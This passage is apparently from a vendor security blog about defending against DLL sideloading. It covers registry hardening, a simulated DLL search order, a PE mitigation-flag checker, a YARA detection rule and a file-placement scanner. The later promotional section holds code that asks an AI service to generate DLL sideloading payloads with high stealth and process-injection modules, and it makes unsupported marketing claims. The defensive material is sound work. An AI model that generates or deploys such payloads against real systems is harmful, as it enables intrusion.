DLL search order hardening is a specific mitigation technique that addresses the fundamental vulnerability exploited by DLL sideloading attacks. By configuring systems to prioritize loading DLLs from secure, trusted locations, organizations can prevent malicious libraries from being loaded in place of legitimate ones. The following registry modification demonstrates how to enforce safe DLL search behavior:

```registry
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager]
"SafeDllSearchMode"=dword:00000001

; Controls NTFS last-access timestamp updates; it does not affect DLL search order
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem]
"NtfsDisableLastAccessUpdate"=dword:00000001
```
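The effect of safe DLL search mode is easier to see in a small model. The following Python sketch is a simplified simulation of the standard Windows search order: it ignores KnownDLLs, DLL redirection, and manifests, and the directory names and on-disk layout are hypothetical.

```python
SYSTEM_DIRS = [r"C:\Windows\System32", r"C:\Windows\System", r"C:\Windows"]


def dll_search_order(app_dir, current_dir, path_dirs, safe_mode=True):
    """Return the directory order of the standard DLL search (simplified)."""
    if safe_mode:
        # Safe mode moves the current directory behind the system directories.
        return [app_dir, *SYSTEM_DIRS, current_dir, *path_dirs]
    return [app_dir, current_dir, *SYSTEM_DIRS, *path_dirs]


def resolve_dll(name, order, files_on_disk):
    """Return the first directory in the search order that contains the DLL."""
    for directory in order:
        if (directory.lower(), name.lower()) in files_on_disk:
            return directory
    return None


APP_DIR = r"C:\Program Files\Vendor"
DOWNLOADS = r"C:\Users\alice\Downloads"  # acts as the current directory
SYSTEM32 = SYSTEM_DIRS[0]

# Hypothetical disk state: a genuine copy in System32, a planted copy in Downloads.
disk = {(SYSTEM32.lower(), "version.dll"), (DOWNLOADS.lower(), "version.dll")}

safe = resolve_dll("version.dll", dll_search_order(APP_DIR, DOWNLOADS, [], True), disk)
unsafe = resolve_dll("version.dll", dll_search_order(APP_DIR, DOWNLOADS, [], False), disk)

# A DLL planted next to the executable is found first in either mode.
disk_planted = disk | {(APP_DIR.lower(), "version.dll")}
planted = resolve_dll("version.dll", dll_search_order(APP_DIR, DOWNLOADS, [], True), disk_planted)
print(safe, unsafe, planted, sep="\n")
```

The last case is the important caveat: the application directory is searched first regardless of this setting, so safe search mode mitigates current-directory planting but not a DLL dropped beside a legitimate executable. That gap is why this control is usually paired with whitelisting and write restrictions on application folders.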

Advanced endpoint protection solutions provide another layer of defense by combining behavioral analysis with machine learning-based threat detection. These platforms can identify suspicious activities associated with DLL sideloading attacks, including unusual process creation patterns, abnormal module loading behavior, and suspicious network communications.

Memory protection mechanisms, including Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP), can make exploitation more difficult for AI-generated payloads. While sophisticated attackers may attempt to bypass these protections, they still represent important obstacles that increase the complexity of successful attacks.
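Whether a given binary opts into these protections is recorded in the `DllCharacteristics` field of its PE optional header. The sketch below reads that field using only the standard library. The helper `make_minimal_pe` is a hypothetical test fixture that builds just enough header bytes for the demonstration; it does not produce a loadable image.

```python
import struct

# Flag values from the PE format's DllCharacteristics field.
FLAGS = {
    "ASLR (DYNAMIC_BASE)": 0x0040,
    "DEP (NX_COMPAT)": 0x0100,
    "CFG (GUARD_CF)": 0x4000,
}


def read_mitigations(pe_bytes: bytes) -> dict:
    """Report which mitigation flags a PE file's header declares."""
    if pe_bytes[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    (pe_offset,) = struct.unpack_from("<I", pe_bytes, 0x3C)  # e_lfanew
    if pe_bytes[pe_offset:pe_offset + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    optional_header = pe_offset + 4 + 20  # skip signature and COFF file header
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+ optional headers.
    (characteristics,) = struct.unpack_from("<H", pe_bytes, optional_header + 70)
    return {name: bool(characteristics & bit) for name, bit in FLAGS.items()}


def make_minimal_pe(characteristics: int) -> bytes:
    """Build header-only bytes for demonstration (hypothetical fixture)."""
    pe_offset = 0x80
    buf = bytearray(pe_offset + 24 + 72)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, pe_offset)
    buf[pe_offset:pe_offset + 4] = b"PE\0\0"
    struct.pack_into("<H", buf, pe_offset + 24 + 70, characteristics)
    return bytes(buf)


sample = make_minimal_pe(0x0040 | 0x0100)  # ASLR and DEP set, CFG not set
report = read_mitigations(sample)
print(report)
```

Running a check like this across the DLLs an application ships with is one way to spot libraries that were built without the protections the rest of the product uses, which can be a useful triage signal.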

The following table compares different defensive countermeasures and their effectiveness against AI DLL sideloading attacks:

| Countermeasure | Effectiveness | Implementation Complexity | Performance Impact |
|---|---|---|---|
| Application Whitelisting | High | Medium | Low-Medium |
| Control Flow Integrity | High | Low | Minimal |
| DLL Search Order Hardening | Medium-High | Low | Minimal |
| Memory Protections | Medium | Low | Minimal |
| Behavioral Analysis | High | High | Medium |
| Network Segmentation | Medium | Medium | Low |
| User Behavior Analytics | Medium | High | Medium |

Network segmentation and micro-segmentation strategies can limit the impact of successful DLL sideloading attacks by containing lateral movement and restricting access to sensitive resources. Properly implemented network controls can prevent attackers from pivoting between systems even if they gain initial access through AI-generated payloads.

Regular security assessments and penetration testing are essential for validating defensive measures and identifying potential weaknesses. These activities should specifically test for DLL sideloading vulnerabilities and evaluate the effectiveness of existing controls against AI-enhanced attack techniques.

Threat hunting programs play a crucial role in proactive defense by actively searching for indicators of compromise that automated systems might miss. Skilled threat hunters can identify subtle patterns and anomalies associated with AI DLL sideloading attacks that standard detection mechanisms overlook.

The following YARA rule demonstrates how to detect common characteristics of DLL sideloading attacks:

```yara
rule DLL_Sideloading_Indicator
{
    meta:
        description = "Detects potential DLL sideloading activity"
        author = "Security Team"
        date = "2026-03-31"

    strings:
        $dll_load = "LoadLibrary" ascii wide
        $process_create = "CreateProcess" ascii wide
        // Backslashes must be escaped inside YARA text strings
        $temp_path = "\\Temp\\" ascii wide
        $appdata_path = "\\AppData\\" ascii wide

    condition:
        uint16(0) == 0x5A4D and  // MZ header
        filesize < 5MB and
        2 of ($dll_load*, $process_create*) and
        1 of ($temp_path*, $appdata_path*)
}
```
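For readers less familiar with YARA, the rule's condition can be restated in plain Python. This is a rough equivalent for reasoning about and unit-testing the logic, not a replacement for the YARA engine; the sample byte strings are fabricated for the example.

```python
def contains(data: bytes, text: str) -> bool:
    """Match a string in ASCII or UTF-16LE form, like YARA's 'ascii wide'."""
    return text.encode("ascii") in data or text.encode("utf-16-le") in data


def matches_rule(data: bytes) -> bool:
    """Mirror the rule: MZ header, under 5 MB, both API names, one path marker."""
    is_pe = data[:2] == b"MZ"
    is_small = len(data) < 5 * 1024 * 1024
    api_hits = contains(data, "LoadLibrary") and contains(data, "CreateProcess")
    path_hit = contains(data, "\\Temp\\") or contains(data, "\\AppData\\")
    return is_pe and is_small and api_hits and path_hit


# Fabricated samples: one with only an API name, one with all indicators.
benign = b"MZ" + b"\x00" * 64 + b"LoadLibraryA"
suspect = (
    b"MZ" + b"\x00" * 64
    + b"LoadLibraryW\x00CreateProcessW\x00"
    + "C:\\Users\\x\\AppData\\Local\\Temp\\a.dll".encode("utf-16-le")
)

print(matches_rule(benign), matches_rule(suspect))
```

Both API names appear in a large share of legitimate Windows binaries, so a rule of this shape is best treated as a triage heuristic that narrows the hunting scope, not as a verdict.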

Incident response preparedness is critical for minimizing the impact of successful AI DLL sideloading attacks. Organizations should maintain detailed playbooks that address these specific threats, including procedures for containment, eradication, and recovery. Regular tabletop exercises can help ensure that response teams are ready to handle AI-enhanced attacks effectively.

User education and awareness programs can help prevent initial compromise by teaching employees to recognize phishing attempts and other social engineering tactics commonly used to deliver AI-generated payloads. While technical controls are essential, human factors remain a critical component of comprehensive security programs.

Patch management and vulnerability remediation programs should prioritize addressing known vulnerabilities that could be exploited as entry points for DLL sideloading attacks. Keeping systems up to date with Microsoft security patches reduces the attack surface available to threat actors.

Key Insight: Effective defense against AI DLL sideloading attacks requires layered security controls that combine preventive measures, behavioral detection, and rapid incident response capabilities to minimize potential impact.

How Can mr7 Agent Automate Detection and Response?

mr7 Agent represents a revolutionary approach to automated security assessment and threat detection, particularly for sophisticated threats like AI DLL sideloading attacks. As a local AI-powered penetration testing automation platform, mr7 Agent can systematically identify vulnerabilities, simulate attack scenarios, and validate defensive controls without requiring constant human intervention.

The platform's AI-driven architecture enables it to understand complex attack vectors and adapt its testing methodology accordingly. For DLL sideloading attacks specifically, mr7 Agent can automatically identify potential vulnerable applications, generate test payloads, and execute controlled simulations to evaluate defensive effectiveness. This capability is particularly valuable given the polymorphic nature of AI-generated threats that traditional scanning tools struggle to detect.

Automated vulnerability scanning forms the foundation of mr7 Agent's detection capabilities. The platform can systematically enumerate applications and libraries across network endpoints, identifying potential DLL sideloading opportunities through advanced pattern recognition and behavioral analysis. This includes checking for weak DLL search configurations, missing digital signatures, and unusual file placement patterns.
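As an illustration of the "unusual file placement" check mentioned above, the following sketch walks a directory tree and flags folders in user-writable locations that hold an executable next to one or more DLLs. It is a generic example and not mr7 Agent's implementation; the marker list, function name, and demo layout are assumptions.

```python
import os
import tempfile

# Assumed markers for user-writable locations; adjust per environment.
USER_WRITABLE_MARKERS = ("/appdata/", "/temp/", "/downloads/")


def find_sideload_candidates(root):
    """Return (relative dir, DLL names) for user-writable dirs holding an EXE beside DLLs."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel = "/" + os.path.relpath(dirpath, root).replace(os.sep, "/").lower() + "/"
        names = [f.lower() for f in filenames]
        has_exe = any(n.endswith(".exe") for n in names)
        dlls = sorted(n for n in names if n.endswith(".dll"))
        if has_exe and dlls and any(m in rel for m in USER_WRITABLE_MARKERS):
            findings.append((rel.strip("/"), dlls))
    return findings


# Demo on a throwaway directory tree with a hypothetical layout.
with tempfile.TemporaryDirectory() as root:
    layout = {
        "Program Files/Vendor": ["app.exe", "helper.dll"],
        "Users/alice/AppData/Local/Updater": ["updater.exe", "version.dll"],
    }
    for folder, files in layout.items():
        full = os.path.join(root, *folder.split("/"))
        os.makedirs(full)
        for name in files:
            open(os.path.join(full, name), "wb").close()
    findings = find_sideload_candidates(root)

print(findings)
```

A real scanner would add signature verification and compare DLL names against those the executable actually imports, but even this placement heuristic tends to surface the executable-plus-DLL pairs that sideloading relies on.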

The following command demonstrates how mr7 Agent can initiate automated vulnerability assessment for DLL sideloading risks:

```bash
# Run mr7 Agent DLL sideloading vulnerability scan
mr7-agent scan --module dll_sideloading --target network_segment --output detailed_report.json

# Perform deep analysis on specific hosts
mr7-agent analyze --host 192.168.1.100 --technique reflective_loading --depth maximum
```

Exploitation simulation capabilities allow mr7 Agent to safely test defensive controls against realistic attack scenarios. The platform can generate AI-like polymorphic payloads, execute controlled sideloading attempts, and measure the effectiveness of existing security controls. This testing occurs in isolated environments to prevent actual harm while providing valuable insights into defensive readiness.

Behavioral analysis automation is another key strength of mr7 Agent. The platform can monitor system behavior during simulated attacks, identifying subtle anomalies that might indicate successful compromise. This includes tracking process creation patterns, module loading behavior, memory modifications, and network communications that deviate from expected norms.

Integration with mr7.ai's specialized AI models enhances mr7 Agent's capabilities significantly. KaliGPT can assist with penetration testing strategy and exploit development, while 0Day Coder can generate custom payloads for specific testing scenarios. This combination of local automation and cloud-based AI assistance creates a powerful security assessment ecosystem.

The following Python code snippet demonstrates how mr7 Agent might coordinate with KaliGPT for intelligent payload generation:

```python
import json

import requests


class Mr7AgentIntegration:
    def __init__(self):
        self.mr7_api_endpoint = "http://localhost:8080/api/v1"
        self.kaligpt_endpoint = "https://api.mr7.ai/chat"

    def generate_test_payload(self, target_application, vulnerability_type):
        """Use KaliGPT to generate customized test payload"""
        prompt = (
            f"Generate C++ code for a DLL sideloading test payload targeting "
            f"{target_application} with {vulnerability_type} vulnerability. "
            f"Include proper error handling and cleanup routines."
        )
        response = requests.post(
            self.kaligpt_endpoint,
            json={"prompt": prompt, "model": "penetration-testing"},
        )
        return response.json()["generated_code"]

    def execute_security_assessment(self, target_network):
        """Run comprehensive security assessment using mr7 Agent"""
        assessment_config = {
            "targets": target_network,
            "modules": ["dll_sideloading", "process_injection", "privilege_escalation"],
            "stealth_level": "high",
            "report_format": "json",
        }
        response = requests.post(
            f"{self.mr7_api_endpoint}/assessments", json=assessment_config
        )
        return response.json()

    def analyze_results(self, assessment_id):
        """Analyze assessment results and generate recommendations"""
        results = requests.get(
            f"{self.mr7_api_endpoint}/assessments/{assessment_id}/results"
        ).json()

        # Use DarkGPT (the "dark-analysis" model on the same chat endpoint)
        # for advanced threat analysis
        analysis_prompt = (
            f"Analyze the following security assessment results and identify "
            f"potential AI DLL sideloading attack vectors: {json.dumps(results)}"
        )
        darkgpt_response = requests.post(
            self.kaligpt_endpoint,
            json={"prompt": analysis_prompt, "model": "dark-analysis"},
        )
        return darkgpt_response.json()["analysis"]
```

Continuous monitoring capabilities enable mr7 Agent to maintain persistent vigilance against evolving threats. The platform can establish baseline behavioral patterns, detect deviations from normal activity, and automatically initiate deeper investigations when suspicious behavior is identified. This proactive approach is particularly valuable for detecting AI-generated payloads that might otherwise evade traditional detection systems.

Reporting and remediation automation streamline the response process by generating actionable recommendations and coordinating remediation efforts. mr7 Agent can automatically document findings, prioritize risks based on business impact, and even suggest specific configuration changes to address identified vulnerabilities.

The platform's local execution model provides several important advantages for security testing. Unlike cloud-based solutions that might raise privacy concerns or compliance issues, mr7 Agent operates entirely on-premises, ensuring that sensitive security data never leaves the organization's control. This is particularly important for organizations in regulated industries or those handling highly sensitive information.

Collaboration features facilitate teamwork between security professionals and mr7 Agent. Multiple team members can access assessment results, contribute to analysis efforts, and coordinate response activities through integrated dashboards and communication tools. This collaborative approach ensures that human expertise complements automated capabilities effectively.

New users can explore mr7 Agent's capabilities through 10,000 free tokens available at mr7.ai. This trial period allows security teams to evaluate the platform's effectiveness against their specific environments and threat landscapes without financial commitment.

Integration with existing security infrastructure ensures that mr7 Agent complements rather than replaces current investments. The platform can consume data from SIEM systems, feed results to SOAR platforms, and coordinate with existing endpoint protection solutions to create a cohesive security ecosystem.

Training and certification programs help security teams maximize the value they derive from mr7 Agent. Comprehensive documentation, video tutorials, and hands-on workshops ensure that users can effectively leverage the platform's advanced capabilities for defending against AI DLL sideloading attacks and other sophisticated threats.

Key Insight: mr7 Agent automates the complex process of detecting and responding to AI DLL sideloading attacks through intelligent vulnerability assessment, behavioral analysis, and coordinated response capabilities that scale security operations effectively.

Key Takeaways

• AI DLL sideloading attacks represent a significant evolution in living-off-the-land techniques, leveraging generative AI to create polymorphic payloads that bypass traditional security controls
• Real-world 2026 campaigns demonstrate the operational effectiveness of AI-generated payloads, with threat actors deploying thousands of unique variants that challenge signature-based detection
• Sophisticated evasion methods employed by AI-powered attacks include multi-layer polymorphism, environmental awareness, behavioral mimicry, and adaptive communication protocols
• Behavioral analysis provides the most promising detection approach, requiring comprehensive telemetry collection and anomaly-based monitoring to identify subtle indicators of compromise
• Effective defensive countermeasures combine preventive controls like application whitelisting with advanced detection capabilities and rapid incident response procedures
• mr7 Agent automates security assessment and threat detection for AI DLL sideloading attacks through local AI-powered penetration testing and behavioral analysis capabilities
• Organizations can evaluate mr7 Agent's effectiveness through 10,000 free tokens available at mr7.ai, enabling comprehensive testing without upfront investment

Frequently Asked Questions

Q: How do AI DLL sideloading attacks differ from traditional DLL hijacking?

AI DLL sideloading attacks use generative AI to create polymorphic payloads that constantly change their structure and behavior, making them much harder to detect than traditional attacks that rely on static malicious DLLs with consistent signatures.

Q: What makes AI-generated payloads so difficult to detect?

AI-generated payloads incorporate advanced obfuscation, environmental awareness, and behavioral mimicry that allows them to adapt to different environments and evade both signature-based and heuristic detection systems.

Q: Can traditional antivirus software detect AI DLL sideloading attacks?

Most traditional antivirus solutions struggle to detect AI DLL sideloading attacks due to their polymorphic nature and ability to mimic legitimate system behavior, requiring advanced behavioral analysis for effective detection.

Q: How quickly can attackers generate new AI payload variants?

AI systems can generate thousands of unique payload variants within minutes, far exceeding the capacity of manual development and making signature-based defenses largely ineffective.

Q: What role does mr7 Agent play in defending against these attacks?

mr7 Agent automates the detection and response process by conducting intelligent vulnerability assessments, simulating AI-powered attack scenarios, and providing behavioral analysis to identify compromise indicators.

Stop Manual Testing. Start Using AI.

mr7 Agent automates reconnaissance, exploitation, and reporting while you focus on what matters - finding critical vulnerabilities. Plus, use KaliGPT and 0Day Coder for real-time AI assistance.
